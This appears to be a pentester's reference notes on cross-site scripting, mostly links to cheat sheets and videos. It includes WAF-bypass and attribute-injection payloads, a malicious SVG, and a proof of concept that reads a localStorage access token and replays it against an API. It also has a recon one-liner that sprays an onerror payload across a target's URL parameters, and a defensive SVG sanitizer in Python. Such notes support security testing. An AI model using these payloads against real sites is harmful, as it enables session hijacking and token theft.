Resources
- https://twitter.com/garethheyes (Knowledgeable in XSS)
Identification
Simple Injection Payloads
- Escaping context:
%27-alert(document.domain)-%27
XSS Polyglots
- https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
XSS Filter Evasion Cheat Sheet
- https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
Prototype Pollution
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution
Proof of Concept
Local Storage Access Token Proof of Concept
https://medium.com/redteam/stealing-jwts-in-localstorage-via-xss-6048d91378a0
```javascript
// PoC: script running in the page can read any token kept in localStorage
// (unlike an HttpOnly cookie) and replay it against the API.
with({xhr: new XMLHttpRequest()}){
    xhr.open('PUT', '[URL]', true);
    xhr.setRequestHeader('Accept', 'application/json');
    xhr.setRequestHeader('Content-Type', 'application/json');
    // token read straight out of web storage
    xhr.setRequestHeader('Authorization', 'Bearer ' + localStorage['accessToken']);
    xhr.send(JSON.stringify({[JSON PAYLOAD]}));
}
```
XSS in SVG File
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>
```
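As an added defensive example (not from the original notes or from any project linked here): a small Python checker that parses an uploaded SVG and flags or strips the script-capable constructs, run against the payload above as constructed input. A parser-based stripper is a first filter only; serving user uploads from a separate origin with `Content-Disposition: attachment` and a restrictive CSP is the more robust mitigation.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_NS)  # keep the default namespace when re-serialising
ET.register_namespace("xlink", "http://www.w3.org/1999/xlink")

# Elements that can execute script or embed arbitrary HTML inside an SVG.
SCRIPT_ELEMENTS = {"script", "foreignobject"}

# Constructed sample input: the SVG payload from the note above.
MALICIOUS_SVG = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">alert("XSS");</script>
</svg>"""


def _local(qname):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1].lower()


def _is_active_attr(name, value):
    # on* event handlers and javascript: URLs (href / xlink:href) both run script.
    return name.startswith("on") or (name == "href" and value.strip().lower().startswith("javascript:"))


def find_active_content(svg_text):
    """Return a finding per script-capable construct; an empty list means none were found."""
    findings = []
    for el in ET.fromstring(svg_text).iter():
        tag = _local(el.tag)
        if tag in SCRIPT_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            if _is_active_attr(_local(attr), value):
                findings.append(f"{_local(attr)} attribute on <{tag}>")
    return findings


def strip_active_content(svg_text):
    """Drop script elements and active attributes, returning the cleaned SVG markup."""
    root = ET.fromstring(svg_text)
    for parent in list(root.iter()):          # snapshot first: we mutate while walking
        for child in list(parent):
            if _local(child.tag) in SCRIPT_ELEMENTS:
                parent.remove(child)
    for el in root.iter():
        for attr in list(el.attrib):
            if _is_active_attr(_local(attr), el.attrib[attr]):
                del el.attrib[attr]
    return ET.tostring(root, encoding="unicode")
```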
Creating a login phishing page using application elements
## XSS Bypasses
**Resources**
- https://waf-bypass.com/tag/cloudflare/
CloudFlare and WordFence
xss">x%253Csvg%2520onload=alert%26%230000000040"1")%253E
Special Cases
GitLab: Bypass File Upload Restrictions to inject double quotes
https://www.youtube.com/watch?v=5dneugeMSso
Filename Regex
Bypassing Validator
Data-original
CSP Bypass (Use Google JSONP API)
Preventing XSS in Salesforce
Server-side Scripting Language https://ampscript.guide/language/#:~:text=Unlike%20other%20general%2Dpurpose%20languages,when%20the%20content%20is%20rendered.
Tainted parameter variables in Ampscript https://ampscript.guide/requestparameter/
- Follow tainted variables until a sink is found, such as output in HTML
- %% is the pre-processing tag, similar to <?php
- Server-side JavaScript (SSJS) is also used: some code runs before the page renders and some runs in the browser
- https://developer.salesforce.com/docs/marketing/marketing-cloud/guide/ssjs_serverSideJavaScript.html
- Salesforce has many flavours including lightningscript and ampscript
https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_xss.htm
Noscript Google XSS
https://www.youtube.com/watch?v=gVrdE6g_fa8
Access Key
If your input is reflected inside "unexploitable tags" you could try the accesskey trick to abuse the vuln (you will need some kind of social engineering to exploit this): " accesskey="x" onclick="alert(1)" x="
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
Universal XSS using iCloud
- https://www.youtube.com/watch?v=Yt1a3j-U2zI
XSS via Markdown
- https://medium.com/taptuit/exploiting-xss-via-markdown-72a61e774bf8
Payload from Twitter
```shell
# escaped dot so the filter drops only real file extensions
echo https://target.com | waybackurls | grep "=" | egrep -iv "\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq
```
